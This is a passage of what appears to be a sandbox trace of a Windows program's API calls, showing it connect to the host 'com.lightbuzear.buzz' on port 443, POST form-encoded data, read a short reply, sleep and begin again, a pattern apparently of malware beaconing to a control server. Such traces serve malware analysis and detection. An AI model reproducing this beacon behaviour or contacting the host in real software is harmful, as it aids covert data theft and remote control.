0x47ce640 [0271.280] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0271.280] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0271.280] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0271.280] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0271.280] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0271.280] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0271.280] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0271.280] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0271.280] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ede0 [0271.281] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0271.281] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f020 [0271.281] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ede0 | out: hHeap=0x4780000) returned 1 [0271.281] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0271.281] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f020 | out: hHeap=0x4780000) returned 1 [0271.281] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800f28 [0271.281] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0271.281] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0271.281] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0271.281] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0271.281] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0271.281] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800aa0 [0271.282] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0271.282] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0271.283] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0271.283] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0271.283] FreeLibrary (hLibModule=0x71780000) returned 1 [0271.283] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800aa0 | out: hHeap=0x4780000) returned 1 [0271.283] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0271.283] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800aa0 [0271.283] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0271.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0271.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0271.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0271.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0271.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0271.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0271.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0271.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0271.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0271.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480efa8 [0271.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0271.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f068 [0271.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480efa8 | out: hHeap=0x4780000) returned 1 [0271.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0271.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f068 | out: hHeap=0x4780000) returned 1 [0271.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f020 [0271.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48005f0 [0271.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005f0 | out: hHeap=0x4780000) returned 1 [0271.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0271.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800578 [0271.285] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0271.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48005f0 [0271.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0271.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0271.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0271.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0271.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0271.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0271.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0271.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0271.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0271.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ee58 [0271.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0271.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f068 [0271.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee58 | out: hHeap=0x4780000) returned 1 [0271.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0271.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f068 | out: hHeap=0x4780000) returned 1 [0271.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ede0 [0271.286] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009d8 [0271.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009d8 | out: hHeap=0x4780000) returned 1 [0271.287] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0271.287] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0271.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0271.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0271.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0271.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0271.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0271.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0271.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0271.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0271.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0271.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480edb0 [0271.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0271.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed80 [0271.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edb0 | out: hHeap=0x4780000) returned 1 [0271.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0271.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed80 | out: hHeap=0x4780000) returned 1 [0271.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48009d8 [0271.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0271.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0271.288] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48009d8 | out: hHeap=0x4780000) returned 1 [0271.288] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48009d8 [0271.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0271.289] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2a8 [0271.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0271.289] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0271.289] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0271.290] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0271.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0271.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0271.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0271.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0271.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0271.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0271.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0271.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0271.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0271.290] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0271.290] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef78 [0271.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0271.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eee8 [0271.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef78 | out: hHeap=0x4780000) returned 1 [0271.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0271.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eee8 | out: hHeap=0x4780000) returned 1 [0271.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a2a8 [0271.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0271.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0271.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0271.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2a8 [0271.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0271.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ff0 [0271.292] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0271.322] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0271.323] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0271.323] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0272.405] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ff0 | out: hHeap=0x4780000) returned 1 [0272.405] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0272.405] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0272.406] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0272.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0272.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0272.406] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0272.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0272.406] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0272.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0272.406] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0272.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0272.406] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0272.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eee8 [0272.406] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0272.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ee40 [0272.406] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eee8 | out: hHeap=0x4780000) returned 1 [0272.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0272.406] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ee40 | out: hHeap=0x4780000) returned 1 [0272.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be7f8 [0272.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0272.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0272.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be7f8 | out: hHeap=0x4780000) returned 1 [0272.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bea78 [0272.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0272.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bea28 [0272.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0272.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0272.408] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0272.408] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0272.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bea28 | out: hHeap=0x4780000) returned 1 [0272.408] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0272.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0272.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0272.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0272.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0272.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0272.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0272.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0272.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0272.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0272.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480edb0 [0272.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0272.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480eee8 [0272.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edb0 | out: hHeap=0x4780000) returned 1 [0272.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0272.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eee8 | out: hHeap=0x4780000) returned 1 [0272.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47beaf0 [0272.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0272.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0272.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beaf0 | out: hHeap=0x4780000) returned 1 [0272.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beaa0 [0272.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0272.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec30 [0272.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0272.410] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0272.410] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0272.410] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0272.410] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec30 | out: hHeap=0x4780000) returned 1 [0272.410] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0272.410] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0272.410] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0272.410] FreeLibrary (hLibModule=0x71570000) returned 1 [0272.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0272.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0272.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48005f0 | out: hHeap=0x4780000) returned 1 [0272.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800578 | out: hHeap=0x4780000) returned 1 [0272.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800aa0 | out: hHeap=0x4780000) returned 1 [0272.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830de0 | out: hHeap=0x4780000) returned 1 [0272.411] Sleep (dwMilliseconds=0x2710) [0272.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0272.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0272.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0272.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0272.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0272.435] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0272.435] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0272.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0272.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0272.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f068 [0272.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0272.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed80 [0272.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f068 | out: hHeap=0x4780000) returned 1 [0272.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0272.436] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed80 | out: hHeap=0x4780000) returned 1 [0272.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480eee8 [0272.436] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be7f8 [0272.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be7f8 | out: hHeap=0x4780000) returned 1 [0272.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0272.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be8c0 [0272.437] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0272.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0272.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0272.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0272.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0272.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0272.437] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0272.437] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0272.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0272.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0272.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480eea0 [0272.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0272.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ef18 [0272.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480eea0 | out: hHeap=0x4780000) returned 1 [0272.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0272.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef18 | out: hHeap=0x4780000) returned 1 [0272.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47beb18 [0272.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0272.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb940 [0272.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb18 | out: hHeap=0x4780000) returned 1 [0272.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beca8 [0272.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0272.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bea00 [0272.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0272.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0272.439] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0272.439] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; 